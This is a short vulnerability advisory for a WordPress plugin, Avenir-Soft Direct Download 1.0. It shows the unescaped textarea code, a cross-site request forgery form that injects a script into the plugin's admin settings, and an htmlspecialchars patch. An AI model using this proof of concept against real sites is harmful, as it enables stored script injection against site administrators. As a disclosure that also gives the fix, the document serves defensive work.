WordPress Avenir-Soft Direct Download 1.0 XSS / CSRF
Posted on 09 August 2015
###################### # Exploit Title: Wordpress Avenir-Soft Direct Download Plug-in XSS/CSRF # Exploit Author: Ashiyane Digital Security Team # Vendor Homepage: https://wordpress.org/plugins/avenirsoft-directdownload/ # Date: 2015-08-06 # Tested On: Kali Linux - FireFox # Software Link: https://downloads.wordpress.org/plugin/avenirsoft-directdownload.zip # Version: 1.0 ###################### # Vulnerable Code: <form method="post" action=""> <textarea name="style1" class="style" rows="10" cols="20"><?php echo file_get_contents($cssurl); ?> </textarea> <p> <input type="submit" value="Save Changes" name="submitbutton"> </p> </form> ###################### # Exploit: <form method="post" action="http://[URL]/[Path]/wp-admin/admin.php?page=avenir_plugin"> <input type="hidden" name="style1" value="</textarea><script>alert(/xss/)</script>"> <input type="submit" value="Save Changes" name="submitbutton"> </p> </form> ###################### # Patch: <form method="post" action=""> <textarea name="style1" class="style" rows="10" cols="20"><?php echo htmlspecialchars(file_get_contents($cssurl)); ?> </textarea> <p> <input type="submit" value="Save Changes" name="submitbutton"> </p> </form> ###################### # Discovered By: Mahdi.Hidden ######################
